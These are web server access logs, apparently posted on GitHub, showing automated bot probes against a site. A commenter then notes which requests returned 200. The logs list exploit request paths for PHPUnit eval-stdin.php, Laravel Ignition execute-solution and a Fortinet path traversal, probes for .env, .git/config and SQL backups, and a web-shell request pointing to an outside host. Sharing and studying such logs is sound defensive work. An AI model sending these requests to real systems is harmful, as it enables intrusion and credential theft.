34.76.158.233 - - [25/Feb/2023:06:02:44 +0000] "GET / HTTP/1.1" 200 234 "-" "python-requests/2.28.2"
109.206.241.102 - - [25/Feb/2023:06:59:17 +0000] "GET / HTTP/1.1" 200 396 "-" "python-requests/2.28.1"
35.188.61.231 - - [25/Feb/2023:09:31:56 +0000] "GET / HTTP/1.1" 200 396 "-" "python-requests/2.28.2"
217.138.222.100 - - [25/Feb/2023:14:24:06 +0000] "GET /db.sql HTTP/1.1" 404 134 "-" "python-requests/2.28.2"
34.76.96.55 - - [25/Feb/2023:20:18:20 +0000] "GET / HTTP/1.1" 200 396 "-" "python-requests/2.28.2"
34.76.96.55 - - [26/Feb/2023:06:03:09 +0000] "GET / HTTP/1.1" 200 234 "-" "python-requests/2.28.2"
20.225.133.97 - - [26/Feb/2023:09:06:01 +0000] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 200 1931 "-" "python-requests/2.28.2"
20.225.133.97 - - [26/Feb/2023:10:06:57 +0000] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 162 "-" "python-requests/2.28.2"
212.87.204.214 - - [26/Feb/2023:12:16:54 +0000] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 134 "-" "python-requests/2.25.1"
85.209.135.214 - - [26/Feb/2023:12:36:19 +0000] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 134 "-" "python-requests/2.25.1"
185.224.128.219 - - [26/Feb/2023:13:57:38 +0000] "GET /_asterisk/ HTTP/1.1" 404 134 "-" "python-requests/2.22.0"
185.224.128.219 - - [26/Feb/2023:14:03:39 +0000] "GET /freepbx/recordings/theme/main.css HTTP/1.1" 400 264 "-" "python-requests/2.22.0"
185.224.128.219 - - [26/Feb/2023:14:13:49 +0000] "GET / HTTP/1.1" 200 234 "-" "python-requests/2.22.0"
34.76.96.55 - - [26/Feb/2023:18:42:48 +0000] "GET / HTTP/1.1" 200 396 "-" "python-requests/2.28.2"
130.211.54.158 - - [26/Feb/2023:19:50:05 +0000] "GET / HTTP/1.1" 200 396 "-" "python-requests/2.28.2"
35.195.93.98 - - [27/Feb/2023:01:36:45 +0000] "GET / HTTP/1.1" 200 396 "-" "python-requests/2.28.2"
185.225.73.68 - - [27/Feb/2023:01:39:06 +0000] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 134 "-" "python-requests/2.28.2"
45.134.144.119 - - [27/Feb/2023:04:35:07 +0000] "GET ///remote/fgt_lang?lang=/../../../..//////////dev/ HTTP/1.1" 404 134 "-" "python-requests/2.6.0 CPython/2.7.5 Linux/3.10.0-1160.el7.x86_64"
35.233.62.116 - - [27/Feb/2023:06:01:52 +0000] "GET / HTTP/1.1" 200 234 "-" "python-requests/2.28.2"
34.78.120.99 - - [27/Feb/2023:08:02:07 +0000] "GET / HTTP/1.1" 200 396 "-" "python-requests/2.28.2"
149.102.246.19 - - [27/Feb/2023:11:30:03 +0000] "GET /backup.sql HTTP/1.1" 404 134 "-" "python-requests/2.28.2"
185.225.74.39 - - [27/Feb/2023:14:21:03 +0000] "GET /.git/config HTTP/1.1" 404 134 "-" "python-requests/2.28.2"
185.225.74.39 - - [27/Feb/2023:14:21:04 +0000] "GET /.git/config HTTP/1.1" 404 134 "-" "python-requests/2.28.2"
185.225.74.39 - - [27/Feb/2023:14:21:04 +0000] "GET /.git/config HTTP/1.1" 404 134 "-" "python-requests/2.28.2"
185.225.74.39 - - [27/Feb/2023:14:21:04 +0000] "GET /.git/config HTTP/1.1" 404 134 "-" "python-requests/2.28.2"
185.225.74.39 - - [27/Feb/2023:14:21:06 +0000] "GET /.git/config HTTP/1.1" 404 134 "-" "python-requests/2.28.2"
185.225.74.39 - - [27/Feb/2023:14:21:06 +0000] "GET /.git/config HTTP/1.1" 404 134 "-" "python-requests/2.28.2"
138.199.46.14 - - [27/Feb/2023:15:06:54 +0000] "GET /.env HTTP/1.1" 404 134 "-" "python-requests/2.28.2"
34.76.96.55 - - [27/Feb/2023:19:41:08 +0000] "GET / HTTP/1.1" 200 396 "-" "python-requests/2.28.2"
35.195.93.98 - - [28/Feb/2023:05:51:38 +0000] "GET / HTTP/1.1" 200 234 "-" "python-requests/2.28.2"
34.77.127.183 - - [28/Feb/2023:05:56:42 +0000] "GET / HTTP/1.1" 200 396 "-" "python-requests/2.28.2"
34.78.6.216 - - [28/Feb/2023:07:20:36 +0000] "GET / HTTP/1.1" 200 396 "-" "python-requests/2.28.2"
149.102.246.19 - - [28/Feb/2023:09:35:32 +0000] "GET /backup2.sql HTTP/1.1" 404 134 "-" "python-requests/2.28.2"
185.224.128.219 - - [28/Feb/2023:18:00:21 +0000] "GET /_asterisk/ HTTP/1.1" 404 134 "-" "python-requests/2.22.0"
185.224.128.219 - - [28/Feb/2023:18:07:54 +0000] "GET /freepbx/recordings/theme/main.css HTTP/1.1" 400 264 "-" "python-requests/2.22.0"
185.224.128.219 - - [28/Feb/2023:18:15:31 +0000] "GET / HTTP/1.1" 200 234 "-" "python-requests/2.22.0"
35.233.62.116 - - [28/Feb/2023:19:21:08 +0000] "GET / HTTP/1.1" 200 396 "-" "python-requests/2.28.2"
34.76.96.55 - - [01/Mar/2023:05:43:45 +0000] "GET / HTTP/1.1" 200 234 "-" "python-requests/2.28.2"
157.230.243.253 - - [01/Mar/2023:18:14:50 +0000] "POST /_ignition/execute-solution HTTP/1.1" 500 580678 "-" "python-requests/2.18.4"
157.230.243.253 - - [01/Mar/2023:18:14:50 +0000] "POST /_ignition/execute-solution HTTP/1.1" 200 31 "-" "python-requests/2.18.4"
157.230.243.253 - - [01/Mar/2023:18:14:50 +0000] "POST /_ignition/execute-solution HTTP/1.1" 200 31 "-" "python-requests/2.18.4"
157.230.243.253 - - [01/Mar/2023:18:14:50 +0000] "POST /_ignition/execute-solution HTTP/1.1" 500 614350 "-" "python-requests/2.18.4"
157.230.243.253 - - [01/Mar/2023:18:14:50 +0000] "POST /_ignition/execute-solution HTTP/1.1" 500 580968 "-" "python-requests/2.18.4"
157.230.243.253 - - [01/Mar/2023:18:14:50 +0000] "POST /_ignition/execute-solution HTTP/1.1" 200 31 "-" "python-requests/2.18.4"
157.230.243.253 - - [01/Mar/2023:18:15:12 +0000] "POST /_ignition/execute-solution HTTP/1.1" 200 198316 "-" "python-requests/2.18.4"
157.230.243.253 - - [01/Mar/2023:18:15:12 +0000] "POST /_ignition/execute-solution HTTP/1.1" 200 31 "-" "python-requests/2.18.4"
157.230.243.253 - - [01/Mar/2023:18:15:12 +0000] "GET /servers.php HTTP/1.1" 404 622 "-" "python-requests/2.18.4"
157.230.243.253 - - [01/Mar/2023:18:15:12 +0000] "GET /storage/servers.php HTTP/1.1" 200 58 "-" "python-requests/2.18.4"
157.230.243.253 - - [01/Mar/2023:18:15:12 +0000] "GET /asu.php?0day=52.37.113.80/lottery/in HTTP/1.1" 404 622 "-" "python-requests/2.18.4"
157.230.243.253 - - [01/Mar/2023:18:15:12 +0000] "GET /suw.php HTTP/1.1" 404 622 "-" "python-requests/2.18.4"
157.230.243.253 - - [01/Mar/2023:18:15:12 +0000] "GET /id.php HTTP/1.1" 404 622 "-" "python-requests/2.18.4"
157.230.243.253 - - [01/Mar/2023:18:15:12 +0000] "GET /fuyuh.php HTTP/1.1" 404 622 "-" "python-requests/2.18.4"
157.230.243.253 - - [01/Mar/2023:18:15:12 +0000] "GET /canary.php HTTP/1.1" 404 622 "-" "python-requests/2.18.4"
157.230.243.253 - - [01/Mar/2023:18:15:13 +0000] "GET /can.php HTTP/1.1" 404 622 "-" "python-requests/2.18.4"
35.233.62.116 - - [01/Mar/2023:19:19:29 +0000] "GET / HTTP/1.1" 200 396 "-" "python-requests/2.28.2"
171.22.30.113 - - [01/Mar/2023:19:35:07 +0000] "GET /.git/config HTTP/1.1" 404 134 "-" "python-requests/2.28.1"
130.211.54.158 - - [02/Mar/2023:05:36:23 +0000] "GET / HTTP/1.1" 200 234 "-" "python-requests/2.28.2"
45.134.144.119 - - [02/Mar/2023:06:43:52 +0000] "GET ///remote/fgt_lang?lang=/../../../..//////////dev/ HTTP/1.1" 404 134 "-" "python-requests/2.6.0 CPython/2.7.5 Linux/3.10.0-1160.el7.x86_64"
193.56.29.180 - - [02/Mar/2023:09:53:04 +0000] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 134 "-" "python-requests/2.25.1"
185.224.128.219 - - [02/Mar/2023:18:48:58 +0000] "GET /_asterisk/ HTTP/1.1" 404 134 "-" "python-requests/2.22.0"
34.140.248.32 - - [02/Mar/2023:18:51:59 +0000] "GET / HTTP/1.1" 200 396 "-" "python-requests/2.28.2"
185.224.128.219 - - [02/Mar/2023:19:04:26 +0000] "GET /freepbx/recordings/theme/main.css HTTP/1.1" 400 264 "-" "python-requests/2.22.0"
185.224.128.219 - - [02/Mar/2023:19:09:38 +0000] "GET / HTTP/1.1" 200 234 "-" "python-requests/2.22.0"
34.77.127.183 - - [03/Mar/2023:05:36:11 +0000] "GET / HTTP/1.1" 200 234 "-" "python-requests/2.28.2"
209.145.49.145 - - [03/Mar/2023:06:14:31 +0000] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 301 178 "-" "python-requests/2.28.2"
20.14.93.102 - - [03/Mar/2023:09:29:18 +0000] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 134 "-" "python-requests/2.28.2"
20.172.144.200 - - [03/Mar/2023:14:23:26 +0000] "GET /.env HTTP/1.1" 404 134 "-" "python-requests/2.28.2"
20.172.144.200 - - [03/Mar/2023:14:23:36 +0000] "GET /.env HTTP/1.1" 404 2316 "-" "python-requests/2.28.2"
20.172.144.200 - - [03/Mar/2023:14:23:37 +0000] "GET /.env HTTP/1.1" 200 1931 "-" "python-requests/2.28.2"
20.172.144.200 - - [03/Mar/2023:14:23:39 +0000] "GET /.env HTTP/1.1" 200 1931 "-" "python-requests/2.28.2"
20.172.144.200 - - [03/Mar/2023:14:23:39 +0000] "GET /.env HTTP/1.1" 404 116 "-" "python-requests/2.28.2"
20.172.144.200 - - [03/Mar/2023:14:23:43 +0000] "GET /.env HTTP/1.1" 200 411 "-" "python-requests/2.28.2"
20.172.144.200 - - [03/Mar/2023:14:23:46 +0000] "GET /.env HTTP/1.1" 404 116 "-" "python-requests/2.28.2"
20.172.144.200 - - [03/Mar/2023:14:23:46 +0000] "GET /.env HTTP/1.1" 503 1584 "-" "python-requests/2.28.2"
20.172.144.200 - - [03/Mar/2023:14:23:46 +0000] "GET /.env HTTP/1.1" 404 134 "-" "python-requests/2.28.2"
20.172.144.200 - - [03/Mar/2023:14:24:41 +0000] "POST / HTTP/1.1" 405 166 "-" "python-requests/2.28.2"
20.172.144.200 - - [03/Mar/2023:14:24:52 +0000] "POST / HTTP/1.1" 405 191756 "-" "python-requests/2.28.2"
20.172.144.200 - - [03/Mar/2023:14:24:52 +0000] "POST / HTTP/1.1" 405 166 "-" "python-requests/2.28.2"
20.172.144.200 - - [03/Mar/2023:14:24:54 +0000] "POST / HTTP/1.1" 405 166 "-" "python-requests/2.28.2"
20.172.144.200 - - [03/Mar/2023:14:24:55 +0000] "POST / HTTP/1.1" 404 112 "-" "python-requests/2.28.2"
20.172.144.200 - - [03/Mar/2023:14:24:59 +0000] "POST / HTTP/1.1" 405 25 "-" "python-requests/2.28.2"
20.172.144.200 - - [03/Mar/2023:14:25:01 +0000] "POST / HTTP/1.1" 404 112 "-" "python-requests/2.28.2"
20.172.144.200 - - [03/Mar/2023:14:25:02 +0000] "POST / HTTP/1.1" 503 1584 "-" "python-requests/2.28.2"
20.172.144.200 - - [03/Mar/2023:14:25:02 +0000] "POST / HTTP/1.1" 405 166 "-" "python-requests/2.28.2"
34.76.158.233 - - [03/Mar/2023:18:35:12 +0000] "GET / HTTP/1.1" 200 396 "-" "python-requests/2.28.2"
209.145.49.145 - - [03/Mar/2023:20:11:07 +0000] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 134 "-" "python-requests/2.28.2"

@wize-wiz
Copy link

wize-wiz commented Mar 8, 2023

Yea it's a typical bot scanner, only the 200 requests are interesting though, as in the following files:

/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
/_ignition/execute-solution
/.env

from these requests:

128.199.209.214 - - [20/Feb/2023:09:57:17 +0000] "POST /_ignition/execute-solution HTTP/1.1" 200 31 "-" "python-requests/2.18.4"
20.225.133.97 - - [26/Feb/2023:09:06:01 +0000] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 200 1931 "-" "python-requests/2.28.2"
20.172.144.200 - - [03/Mar/2023:14:23:37 +0000] "GET /.env HTTP/1.1" 200 1931 "-" "python-requests/2.28.2"

Where it's quite interesting the same file requests throw a 404, some a 500 and some a 200. Because of the different sizes, I guess it has to do with the data being send, but that doesn't explain the 404.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment